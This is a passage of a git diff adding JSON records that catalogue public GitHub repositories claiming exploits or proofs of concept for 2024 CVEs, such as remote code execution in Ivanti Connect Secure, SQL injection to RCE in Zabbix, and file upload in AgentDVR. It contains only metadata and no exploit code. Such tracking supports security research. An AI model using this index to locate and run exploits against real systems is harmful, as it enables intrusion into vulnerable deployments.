+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 755240791,
+ "name": "CVE-2024-21887",
+ "full_name": "imhunterand\/CVE-2024-21887",
+ "owner": {
+ "login": "imhunterand",
+ "id": 109766416,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/109766416?v=4",
+ "html_url": "https:\/\/github.com\/imhunterand"
+ },
+ "html_url": "https:\/\/github.com\/imhunterand\/CVE-2024-21887",
+ "description": "Ivanti Connect Secure & Ivanti Policy Secure allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance. (RCE Exploits)",
+ "fork": false,
+ "created_at": "2024-02-09T18:07:06Z",
+ "updated_at": "2024-03-24T21:09:47Z",
+ "pushed_at": "2024-02-09T18:08:04Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2024-21887",
+ "exploit-code",
+ "rce-exploit",
+ "remote-code-execution"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-21893.json b/2024/CVE-2024-21893.json
new file mode 100644
index 0000000000..e4cae2b66b
--- /dev/null
+++ b/2024/CVE-2024-21893.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 752054404,
+ "name": "CVE-2024-21893.py",
+ "full_name": "h4x0r-dz\/CVE-2024-21893.py",
+ "owner": {
+ "login": "h4x0r-dz",
+ "id": 26070859,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26070859?v=4",
+ "html_url": "https:\/\/github.com\/h4x0r-dz"
+ },
+ "html_url": "https:\/\/github.com\/h4x0r-dz\/CVE-2024-21893.py",
+ "description": "CVE-2024-21893: SSRF Vulnerability in Ivanti Connect Secure",
+ "fork": false,
+ "created_at": "2024-02-02T22:59:21Z",
+ "updated_at": "2024-06-25T08:05:31Z",
+ "pushed_at": "2024-02-02T23:27:10Z",
+ "stargazers_count": 91,
+ "watchers_count": 91,
+ "has_discussions": false,
+ "forks_count": 15,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 15,
+ "watchers": 91,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 752217325,
+ "name": "CVE-2024-21893-to-CVE-2024-21887",
+ "full_name": "Chocapikk\/CVE-2024-21893-to-CVE-2024-21887",
+ "owner": {
+ "login": "Chocapikk",
+ "id": 88535377,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4",
+ "html_url": "https:\/\/github.com\/Chocapikk"
+ },
+ "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-21893-to-CVE-2024-21887",
+ "description": "CVE-2024-21893 to CVE-2024-21887 Exploit Toolkit",
+ "fork": false,
+ "created_at": "2024-02-03T11:33:40Z",
+ "updated_at": "2024-06-22T14:24:34Z",
+ "pushed_at": "2024-02-03T11:48:37Z",
+ "stargazers_count": 21,
+ "watchers_count": 21,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 21,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-2193.json b/2024/CVE-2024-2193.json
new file mode 100644
index 0000000000..5e13070be6
--- /dev/null
+++ b/2024/CVE-2024-2193.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 778680882,
+ "name": "CVE-2024-2193",
+ "full_name": "uthrasri\/CVE-2024-2193",
+ "owner": {
+ "login": "uthrasri",
+ "id": 145666390,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4",
+ "html_url": "https:\/\/github.com\/uthrasri"
+ },
+ "html_url": "https:\/\/github.com\/uthrasri\/CVE-2024-2193",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-28T07:30:04Z",
+ "updated_at": "2024-03-28T07:31:14Z",
+ "pushed_at": "2024-03-28T07:31:46Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-22002.json b/2024/CVE-2024-22002.json
new file mode 100644
index 0000000000..e4915a2b1a
--- /dev/null
+++ b/2024/CVE-2024-22002.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 738235829,
+ "name": "iCUE_DllHijack_LPE-CVE-2024-22002",
+ "full_name": "0xkickit\/iCUE_DllHijack_LPE-CVE-2024-22002",
+ "owner": {
+ "login": "0xkickit",
+ "id": 141216208,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/141216208?v=4",
+ "html_url": "https:\/\/github.com\/0xkickit"
+ },
+ "html_url": "https:\/\/github.com\/0xkickit\/iCUE_DllHijack_LPE-CVE-2024-22002",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-02T18:49:21Z",
+ "updated_at": "2024-05-23T16:22:19Z",
+ "pushed_at": "2024-05-23T16:18:16Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-22024.json b/2024/CVE-2024-22024.json
new file mode 100644
index 0000000000..d10fbe4c95
--- /dev/null
+++ b/2024/CVE-2024-22024.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 755152479,
+ "name": "CVE-2024-22024",
+ "full_name": "0dteam\/CVE-2024-22024",
+ "owner": {
+ "login": "0dteam",
+ "id": 56728081,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56728081?v=4",
+ "html_url": "https:\/\/github.com\/0dteam"
+ },
+ "html_url": "https:\/\/github.com\/0dteam\/CVE-2024-22024",
+ "description": "Check for CVE-2024-22024 vulnerability in Ivanti Connect Secure",
+ "fork": false,
+ "created_at": "2024-02-09T14:31:56Z",
+ "updated_at": "2024-06-14T03:34:24Z",
+ "pushed_at": "2024-02-09T15:14:03Z",
+ "stargazers_count": 28,
+ "watchers_count": 28,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 28,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-22026.json b/2024/CVE-2024-22026.json
new file mode 100644
index 0000000000..e2cc1a1598
--- /dev/null
+++ b/2024/CVE-2024-22026.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 800980981,
+ "name": "CVE-2024-22026",
+ "full_name": "securekomodo\/CVE-2024-22026",
+ "owner": {
+ "login": "securekomodo",
+ "id": 4809643,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4809643?v=4",
+ "html_url": "https:\/\/github.com\/securekomodo"
+ },
+ "html_url": "https:\/\/github.com\/securekomodo\/CVE-2024-22026",
+ "description": "Exploit POC for CVE-2024-22026 affecting Ivanti EPMM \"MobileIron Core\"",
+ "fork": false,
+ "created_at": "2024-05-15T11:20:45Z",
+ "updated_at": "2024-06-24T06:29:43Z",
+ "pushed_at": "2024-05-15T11:40:29Z",
+ "stargazers_count": 11,
+ "watchers_count": 11,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 11,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-22120.json b/2024/CVE-2024-22120.json
new file mode 100644
index 0000000000..22d4c0f021
--- /dev/null
+++ b/2024/CVE-2024-22120.json
@@ -0,0 +1,36 @@
+[
+ {
+ "id": 803086886,
+ "name": "CVE-2024-22120-RCE",
+ "full_name": "W01fh4cker\/CVE-2024-22120-RCE",
+ "owner": {
+ "login": "W01fh4cker",
+ "id": 101872898,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101872898?v=4",
+ "html_url": "https:\/\/github.com\/W01fh4cker"
+ },
+ "html_url": "https:\/\/github.com\/W01fh4cker\/CVE-2024-22120-RCE",
+ "description": "Time Based SQL Injection in Zabbix Server Audit Log --> RCE",
+ "fork": false,
+ "created_at": "2024-05-20T03:29:09Z",
+ "updated_at": "2024-06-16T08:49:12Z",
+ "pushed_at": "2024-05-21T10:30:49Z",
+ "stargazers_count": 97,
+ "watchers_count": 97,
+ "has_discussions": false,
+ "forks_count": 19,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2024-22120",
+ "redteam",
+ "zabbix"
+ ],
+ "visibility": "public",
+ "forks": 19,
+ "watchers": 97,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-22145.json b/2024/CVE-2024-22145.json
new file mode 100644
index 0000000000..a4daca7d46
--- /dev/null
+++ b/2024/CVE-2024-22145.json
@@ -0,0 +1,37 @@
+[
+ {
+ "id": 744705693,
+ "name": "CVE-2024-22145",
+ "full_name": "RandomRobbieBF\/CVE-2024-22145",
+ "owner": {
+ "login": "RandomRobbieBF",
+ "id": 51722811,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4",
+ "html_url": "https:\/\/github.com\/RandomRobbieBF"
+ },
+ "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-22145",
+ "description": "InstaWP Connect <= 0.1.0.8 - Missing Authorization to Arbitrary Options Update (Subscriber+)",
+ "fork": false,
+ "created_at": "2024-01-17T20:56:21Z",
+ "updated_at": "2024-01-20T05:38:14Z",
+ "pushed_at": "2024-01-17T20:59:47Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2024-22145",
+ "exploit",
+ "instawp-connect",
+ "wordpress"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-22243.json b/2024/CVE-2024-22243.json
new file mode 100644
index 0000000000..e248410f8b
--- /dev/null
+++ b/2024/CVE-2024-22243.json
@@ -0,0 +1,74 @@
+[
+ {
+ "id": 761209664,
+ "name": "CVE-2024-22243",
+ "full_name": "SeanPesce\/CVE-2024-22243",
+ "owner": {
+ "login": "SeanPesce",
+ "id": 20076909,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20076909?v=4",
+ "html_url": "https:\/\/github.com\/SeanPesce"
+ },
+ "html_url": "https:\/\/github.com\/SeanPesce\/CVE-2024-22243",
+ "description": "Example exploitable scenarios for CVE-2024-22243 affecting the Spring framework (open redirect & SSRF).",
+ "fork": false,
+ "created_at": "2024-02-21T12:55:22Z",
+ "updated_at": "2024-05-21T05:07:10Z",
+ "pushed_at": "2024-05-20T13:15:00Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "ctf",
+ "cve-2024-22243",
+ "java",
+ "open-redirect",
+ "server-side-request-forgery",
+ "spring",
+ "ssrf",
+ "uri",
+ "url",
+ "vulnerability",
+ "web"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 762214516,
+ "name": "CVE-2024-22243-CVE-2024-22234",
+ "full_name": "shellfeel\/CVE-2024-22243-CVE-2024-22234",
+ "owner": {
+ "login": "shellfeel",
+ "id": 18633010,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18633010?v=4",
+ "html_url": "https:\/\/github.com\/shellfeel"
+ },
+ "html_url": "https:\/\/github.com\/shellfeel\/CVE-2024-22243-CVE-2024-22234",
+ "description": " env of CVE-2024-22243&CVE-2024-22234",
+ "fork": false,
+ "created_at": "2024-02-23T10:09:51Z",
+ "updated_at": "2024-05-16T01:31:27Z",
+ "pushed_at": "2024-02-28T06:55:26Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-22369.json b/2024/CVE-2024-22369.json
new file mode 100644
index 0000000000..55bf67bf32
--- /dev/null
+++ b/2024/CVE-2024-22369.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 741418632,
+ "name": "CVE-2024-22369",
+ "full_name": "oscerd\/CVE-2024-22369",
+ "owner": {
+ "login": "oscerd",
+ "id": 5106647,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5106647?v=4",
+ "html_url": "https:\/\/github.com\/oscerd"
+ },
+ "html_url": "https:\/\/github.com\/oscerd\/CVE-2024-22369",
+ "description": "CVE-2024-22369 Reproducer",
+ "fork": false,
+ "created_at": "2024-01-10T11:01:59Z",
+ "updated_at": "2024-02-23T03:28:37Z",
+ "pushed_at": "2024-02-20T17:48:31Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-22393.json b/2024/CVE-2024-22393.json
new file mode 100644
index 0000000000..2b73f80023
--- /dev/null
+++ b/2024/CVE-2024-22393.json
@@ -0,0 +1,38 @@
+[
+ {
+ "id": 769052536,
+ "name": "CVE-2024-22393",
+ "full_name": "omranisecurity\/CVE-2024-22393",
+ "owner": {
+ "login": "omranisecurity",
+ "id": 38619429,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38619429?v=4",
+ "html_url": "https:\/\/github.com\/omranisecurity"
+ },
+ "html_url": "https:\/\/github.com\/omranisecurity\/CVE-2024-22393",
+ "description": "Exploit for CVE-2024-22393 Unrestricted Upload of File with Dangerous Type vulnerability in Apache Answer.",
+ "fork": false,
+ "created_at": "2024-03-08T08:45:12Z",
+ "updated_at": "2024-05-30T13:17:54Z",
+ "pushed_at": "2024-05-12T07:42:24Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "answer",
+ "apache",
+ "cve-2024-22393",
+ "exploit",
+ "exploit-cve-2024-22393"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-22411.json b/2024/CVE-2024-22411.json
new file mode 100644
index 0000000000..ed1ec7cae0
--- /dev/null
+++ b/2024/CVE-2024-22411.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 745408511,
+ "name": "avo-CVE-2024-22411",
+ "full_name": "tamaloa\/avo-CVE-2024-22411",
+ "owner": {
+ "login": "tamaloa",
+ "id": 118779,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118779?v=4",
+ "html_url": "https:\/\/github.com\/tamaloa"
+ },
+ "html_url": "https:\/\/github.com\/tamaloa\/avo-CVE-2024-22411",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-19T09:19:52Z",
+ "updated_at": "2024-01-19T09:22:19Z",
+ "pushed_at": "2024-01-19T09:27:32Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-22416.json b/2024/CVE-2024-22416.json
new file mode 100644
index 0000000000..27198e1e4c
--- /dev/null
+++ b/2024/CVE-2024-22416.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 744906613,
+ "name": "ensimag-secu3a-cve-2024-22416",
+ "full_name": "mindstorm38\/ensimag-secu3a-cve-2024-22416",
+ "owner": {
+ "login": "mindstorm38",
+ "id": 17071361,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17071361?v=4",
+ "html_url": "https:\/\/github.com\/mindstorm38"
+ },
+ "html_url": "https:\/\/github.com\/mindstorm38\/ensimag-secu3a-cve-2024-22416",
+ "description": "CVE-2024-22416 exploit experiments",
+ "fork": false,
+ "created_at": "2024-01-18T08:49:07Z",
+ "updated_at": "2024-01-19T13:14:54Z",
+ "pushed_at": "2024-01-19T13:22:58Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-22514.json b/2024/CVE-2024-22514.json
new file mode 100644
index 0000000000..3b6ce06099
--- /dev/null
+++ b/2024/CVE-2024-22514.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 749163366,
+ "name": "CVE-2024-22514-Remote-Code-Execution",
+ "full_name": "Orange-418\/CVE-2024-22514-Remote-Code-Execution",
+ "owner": {
+ "login": "Orange-418",
+ "id": 46978010,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46978010?v=4",
+ "html_url": "https:\/\/github.com\/Orange-418"
+ },
+ "html_url": "https:\/\/github.com\/Orange-418\/CVE-2024-22514-Remote-Code-Execution",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-27T19:04:56Z",
+ "updated_at": "2024-01-27T19:04:56Z",
+ "pushed_at": "2024-02-07T00:18:09Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-22515.json b/2024/CVE-2024-22515.json
new file mode 100644
index 0000000000..917b0a3127
--- /dev/null
+++ b/2024/CVE-2024-22515.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 749102873,
+ "name": "AgentDVR-5.1.6.0-File-Upload-and-Remote-Code-Execution",
+ "full_name": "Orange-418\/AgentDVR-5.1.6.0-File-Upload-and-Remote-Code-Execution",
+ "owner": {
+ "login": "Orange-418",
+ "id": 46978010,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46978010?v=4",
+ "html_url": "https:\/\/github.com\/Orange-418"
+ },
+ "html_url": "https:\/\/github.com\/Orange-418\/AgentDVR-5.1.6.0-File-Upload-and-Remote-Code-Execution",
+ "description": "CVE-2024-22515 arbitrary file upload and CVE-2024-22514 remote code execution for AgentDVR 5.1.6.0 (Authenticated)",
+ "fork": false,
+ "created_at": "2024-01-27T15:36:05Z",
+ "updated_at": "2024-02-09T20:03:09Z",
+ "pushed_at": "2024-03-15T03:19:43Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 749159831,
+ "name": "CVE-2024-22515-File-Upload-Vulnerability",
+ "full_name": "Orange-418\/CVE-2024-22515-File-Upload-Vulnerability",
+ "owner": {
+ "login": "Orange-418",
+ "id": 46978010,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46978010?v=4",
+ "html_url": "https:\/\/github.com\/Orange-418"
+ },
+ "html_url": "https:\/\/github.com\/Orange-418\/CVE-2024-22515-File-Upload-Vulnerability",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-27T18:51:26Z",
+ "updated_at": "2024-01-27T18:51:26Z",
+ "pushed_at": "2024-02-07T00:09:17Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-22532.json b/2024/CVE-2024-22532.json
new file mode 100644
index 0000000000..9301cc11a9
--- /dev/null
+++ b/2024/CVE-2024-22532.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 761709560,
+ "name": "CVE-2024-22532",
+ "full_name": "pwndorei\/CVE-2024-22532",
+ "owner": {
+ "login": "pwndorei",
+ "id": 96749184,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96749184?v=4",
+ "html_url": "https:\/\/github.com\/pwndorei"
+ },
+ "html_url": "https:\/\/github.com\/pwndorei\/CVE-2024-22532",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-02-22T10:44:38Z",
+ "updated_at": "2024-02-22T10:44:38Z",
+ "pushed_at": "2024-02-23T07:26:40Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-22534.json b/2024/CVE-2024-22534.json
new file mode 100644
index 0000000000..5e16e6f580
--- /dev/null
+++ b/2024/CVE-2024-22534.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 748333405,
+ "name": "CVE-2024-22534",
+ "full_name": "austino2000\/CVE-2024-22534",
+ "owner": {
+ "login": "austino2000",
+ "id": 99389401,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99389401?v=4",
+ "html_url": "https:\/\/github.com\/austino2000"
+ },
+ "html_url": "https:\/\/github.com\/austino2000\/CVE-2024-22534",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-25T18:57:34Z",
+ "updated_at": "2024-01-25T18:57:35Z",
+ "pushed_at": "2024-01-25T19:06:19Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-2257.json b/2024/CVE-2024-2257.json
new file mode 100644
index 0000000000..5bf9bb492b
--- /dev/null
+++ b/2024/CVE-2024-2257.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 816772228,
+ "name": "Digisol-DG-GR1321-s-Password-Policy-Bypass-CVE-2024-2257",
+ "full_name": "Redfox-Secuirty\/Digisol-DG-GR1321-s-Password-Policy-Bypass-CVE-2024-2257",
+ "owner": {
+ "login": "Redfox-Secuirty",
+ "id": 173128884,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/173128884?v=4",
+ "html_url": "https:\/\/github.com\/Redfox-Secuirty"
+ },
+ "html_url": "https:\/\/github.com\/Redfox-Secuirty\/Digisol-DG-GR1321-s-Password-Policy-Bypass-CVE-2024-2257",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-18T11:27:57Z",
+ "updated_at": "2024-06-18T11:28:00Z",
+ "pushed_at": "2024-06-18T11:27:57Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-22640.json b/2024/CVE-2024-22640.json
new file mode 100644
index 0000000000..ed3dbbb9ae
--- /dev/null
+++ b/2024/CVE-2024-22640.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 780492523,
+ "name": "CVE-2024-22640",
+ "full_name": "zunak\/CVE-2024-22640",
+ "owner": {
+ "login": "zunak",
+ "id": 14941490,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14941490?v=4",
+ "html_url": "https:\/\/github.com\/zunak"
+ },
+ "html_url": "https:\/\/github.com\/zunak\/CVE-2024-22640",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-01T15:43:07Z",
+ "updated_at": "2024-04-16T17:19:46Z",
+ "pushed_at": "2024-04-01T16:23:46Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-22641.json b/2024/CVE-2024-22641.json
new file mode 100644
index 0000000000..d00d08e1af
--- /dev/null
+++ b/2024/CVE-2024-22641.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 780504370,
+ "name": "CVE-2024-22641",
+ "full_name": "zunak\/CVE-2024-22641",
+ "owner": {
+ "login": "zunak",
+ "id": 14941490,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14941490?v=4",
+ "html_url": "https:\/\/github.com\/zunak"
+ },
+ "html_url": "https:\/\/github.com\/zunak\/CVE-2024-22641",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-01T16:11:28Z",
+ "updated_at": "2024-04-01T16:11:28Z",
+ "pushed_at": "2024-04-01T16:13:13Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-22752.json b/2024/CVE-2024-22752.json
new file mode 100644
index 0000000000..44f242bd89
--- /dev/null
+++ b/2024/CVE-2024-22752.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 767442265,
+ "name": "CVE-2024-22752",
+ "full_name": "hacker625\/CVE-2024-22752",
+ "owner": {
+ "login": "hacker625",
+ "id": 32318573,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32318573?v=4",
+ "html_url": "https:\/\/github.com\/hacker625"
+ },
+ "html_url": "https:\/\/github.com\/hacker625\/CVE-2024-22752",
+ "description": "EaseUS MobiMover 6.0.5 Build 21620 - Insecure Files and Folders Permissions",
+ "fork": false,
+ "created_at": "2024-03-05T09:54:00Z",
+ "updated_at": "2024-03-06T07:18:17Z",
+ "pushed_at": "2024-03-05T10:26:55Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-22774.json b/2024/CVE-2024-22774.json
new file mode 100644
index 0000000000..67032b763c
--- /dev/null
+++ b/2024/CVE-2024-22774.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 776665274,
+ "name": "CVE-2024-22774",
+ "full_name": "Gray-0men\/CVE-2024-22774",
+ "owner": {
+ "login": "Gray-0men",
+ "id": 39830524,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39830524?v=4",
+ "html_url": "https:\/\/github.com\/Gray-0men"
+ },
+ "html_url": "https:\/\/github.com\/Gray-0men\/CVE-2024-22774",
+ "description": "Panoramic Dental Imaging software Stealthy Privilege Escalation Vulnerability",
+ "fork": false,
+ "created_at": "2024-03-24T05:59:57Z",
+ "updated_at": "2024-05-16T20:52:09Z",
+ "pushed_at": "2024-05-16T20:52:06Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
